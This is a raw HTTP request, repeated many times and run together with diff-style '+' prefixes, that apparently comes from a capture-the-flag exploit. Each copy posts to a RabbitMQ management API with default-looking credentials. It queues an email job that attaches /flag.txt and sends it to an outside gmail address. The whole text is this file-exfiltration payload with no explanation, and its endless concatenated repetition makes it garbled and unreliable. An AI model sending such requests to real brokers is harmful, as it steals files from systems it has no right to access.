264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + +{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 +Host: 172.32.56.72:15672 +Authorization: Basic dGVzdDp0ZXN0 +Accept: */* +Content-Length: 264 +Content-Type: application/json;charset=UTF-8 + 